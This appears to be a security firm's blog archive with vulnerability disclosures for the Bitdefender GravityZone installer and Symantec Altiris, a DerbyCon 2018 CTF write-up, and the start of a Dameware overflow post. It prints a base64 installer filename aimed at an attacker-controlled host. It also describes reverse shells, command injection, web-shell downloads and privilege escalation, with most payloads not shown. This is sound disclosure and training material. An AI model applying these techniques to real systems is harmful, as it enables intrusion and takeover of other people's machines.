CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:

  • https://cloudgz-ecs.gravityzone.bitdefender.com/Packages/BSTWIN/0/_9JZBM/installer.xmlxFFlang=en-US

Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe”

The base64 in that filename was modified to contain the URL:

  • http://thiscantbetrue.com/installer.xml

We reran the installer and the results are shown below.

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point, we used a simple trick to skip looking at encrypted data passing over HTTPS, and so we restored the original download URL back to the installer.xml, but we replaced HTTPS with HTTP instead.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that will be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called “Installer.exe”: <run_command params=”” proc=”Installer.exe” />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.

Conclusion

We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be compromised by subsequently poor implementations.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new patched installers and went through a certificate revocation process of the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates are as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificates revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.

image1.jpeg

image2.jpeg

Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service to identify users of the system using the VRFY method to identify susan as a user on the system, as well as use the system to send email. Some time was given to the mail service to send email internally with no output.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the eventually discovered correct pair of credentials were passed to the server during multiple brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the version of Elasticsearch API 1.1.1, which allows for remote code execution. The exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, an exploit that adds the account firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags, however of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised key files. One of the more fun flags was saved in the user’s home directory Pictures/Wallpapers/Untitled.png, which was retrieved from the box; VNC was running on localhost and we saw a number of people port forwarding through the box but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\297b677f\x64.simple.binary-main.png

We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\e73333f3\x64.simple.binary-authenticate.png

It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the users input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.

Knowing that comparison algorithm, one could reverse it until this challenges flag was identified. However, during the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\ff3353af\x64.hard.binary-functions.png

Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating XOR single-byte key. Every byte of the file was XOR’ed with a byte key, which is then incremented by 0x07. The original XOR byte key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:

  • superkai64@minecraft.net

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.

Access to a root shell was gain by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run the less program against the syslog file without requiring a password. Once a root shell was obtained, access to the CTF user’s password was gained from the .bash_history file. This user was defined within the sudoers file as having all root permissions. That account allowed us to access the SSH service bypassing the Jenkins service and gaining the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following requests file and fed this into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularity useful as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path.  Apparently there was a WordPress username – djohnston- embedded in the HTML comments somewhere, and that user has a password of Password1 for wp-admin.  Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenged included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we are able to add a semi-colon to end the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell. This was then downloaded to the WordPress server by using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo groups, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the applications MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reversed proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these are POSTed to the /Login page. This set a cookie called session and then a redirect to /Chat was triggered. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookies value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that the one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within in a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of MAC, utilising some form of strong sever side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickle’s” enough:

Ruby on Rails has gadgets for RCE via derserialization via the ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definition for IdentLDAP and IndentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment and for this we used https://repl.it – essentially an online code test environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after the sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below. This identified two additional hosts, 192.168.252.10 & 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC and as such we deployed a SOCKS proxy server from the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This feature allowed us to access a number of resources, including connecting remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. By clicking the link shown below, it moved to a login prompt which was found to have easily guessable credentials of helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\24ce608a\FreeRDP^% 192.168.252.2_008.png

After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software as well as a flag. We had to identify the default account for this host and found this by doing some research on the Internet. This was root@localhost.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\b3c48de5\Tooltip_006.png

We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One is abusing the packet manager and uploading a new packet which is vulnerable to code execution, and the other abuses the PGP keys which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921) which affected the PGP keys deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\673abbfb\FreeRDP^% 192.168.252.2_015.png

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\e63b38fb\FreeRDP^% 192.168.252.2_016.png

The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen.  However, this didn’t obtain a flag, or at least not until we were able to crack the root password which we didn’t complete before the end of the CTF. In doing this it did reveal that the user’s password for OTRS was OTRS.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\2ac6263c\Selection_017.png

To obtain a full root shell to access the flag we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow & /etc/passwd file to create a new UID 0 user.  We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to login.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’ try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability on the password field. We decided we’d roll with it for the moment and see if it anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on hard side; the actual report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing of the viewreport.php page, persist the current entries and then on every subsequent run check for any new pages. To persist between runs, a static class with static container members was created. LinqPad can use a new process per run of the script which would destroy our static container. To ensure that the results were persisted between runs, the following settings were created (performed by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell Posh C2 (https://github.com/nettitude/PoshC2) one liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\a3c6bd82\Selection_002.png

Once we had C2 on this host, we discovered it was running as the IUSR, which is a low level IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities other than no patches applied. Eternal Blue (MS17-010) could have been an option but this is normally unstable for Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header(‘Flag: TheBruteForceIsStrongInThisOne’);
  • viewreports.php:19:header(‘Flag: InjectionHeaders’);

We also found a file inside the adminscripts folder that had a hint inside suggesting that this was a scheduled task that ran every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, as well as one from the administrators’ desktop.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\f6b90190\Selection_007.png

It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used iLSpy to decompile the binary, but it generated the following error when trying to decompile validateLicense function.

Z:\Desktop\il1.png

We then downloaded the latest version of iLSpy (4.0.0.4319-beta2) which successfully decompiled the code back to C#.

Z:\Desktop\il2.png

The first section of the code took the users first name and MD5 hashed that value. It then took the first eight characters of that substring and used it in the next part of the code. It also had a static string that it used as part of the keygen creation ( Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability within the latest versions of the Symantec Management Agent (Altiris), that allowed us to escalate our privileges.

Overview

When the Altiris agent performs an inventory scan, e.g. software inventory scan, the SYSTEM level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to create a junction to an alternative folder. Thus, the ‘Everyone’ permission is placed on the junction folder, enforcing inheritance on each file or folder within this structure.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version that this was tested by Nettitude was version 7.6, as shown throughout this release, however it was confirmed by Symantec on 12 June 2018 that all versions prior to the patched version are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, from what we believed to be the inventory scan or output from a recent task. These folder and file permissions were found using a simple PowerShell one liner which allowed us to perform an ACL review on any Windows host, using only the tools on that host. An example of this one liner is as follows:

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation

(See: https://gist.github.com/benpturner/de818138c9fcf8e1e67368a901d652f4)

When reviewing the timestamp on these folders, it appeared there was activity happening once a day within this folder. After doing further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Now, depending on the relevant organisations configuration and appetite for inventory management, this may happen more or less than once per day.

Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (awesome post by Ryan Hanson incoming) to see if this type of attack would be possible here:

Here is the folder permissions that we identified on the ‘NSI’ folder. These permissions were also the same on the ‘Outbox’ folder.

We then attempted to redirect the folder to another location using James Forshaw’s symboliclink-testing-tools to create a mount point to another folder and see if those files were written, which was successful. It was also possible to use the junction tools from sysinternals (https://docs.microsoft.com/en-us/sysinternals/). The only problem with the sysinternals junction tool is that it requires the source folder to not exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we were to completely delete this folder we would not have the correct permissions to recreate this attack. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Another tool that could be used for this type of attack is called mklink.exe from Windows, but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To completely understand what process was overwriting these permissions, we uploaded Process Monitor from sysinternals (https://docs.microsoft.com/en-us/sysinternals/) to see what was going on under the hood. As you can see from the output below, all files and folders were getting a DACL applied by the AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways you could choose to make this vulnerability exploitable, but the path of least resistance was trying to override the entire root Altiris folder (“C:\Program Files\Altiris\Alritis Agent\”) permissions so that we could modify the service binary running under the SYSTEM account, namely AeNXSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeNXSAgent.exe service binary, before modifying the mount point to overwrite the permissions:

We then created a mountpoint which points to the folder ‘Altiris Agent’. It’s worth noting that this folder must be empty for the redirection to be possible. Since we have full permissions over every file, this was trivial to complete. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning, and the next screenshot shows the outcome. As we expected the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including the AeNXSAgent.exe.

Once we had full control over AeXNSAgent.exe we could then replace the service binary and reboot the host to obtain SYSTEM level privileges. It is worth noting that privilege escalation vulnerabilities in symlinks are fairly common and James Forshaw himself has found well over twenty as shown here:

Conclusion

This vulnerability affected all versions of Altiris Management Agent, namely up to v7.6, v8.0 and 8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities on run-time and/or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed (https://support.symantec.com/en_US/article.SYMSA1456.html) – 25 July 2018
  • Nettitude release further information – 12 September 2018

CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version (at the time of writing) for Dameware MRC (12.0.5) and it has been assigned CVE-2018-12897. This vulnerability is due to insecure handling of a user input buffer which ultimately allows for overwriting Structured Exception Handler (SEH) addresses and the subsequent hijacking of execution flow.

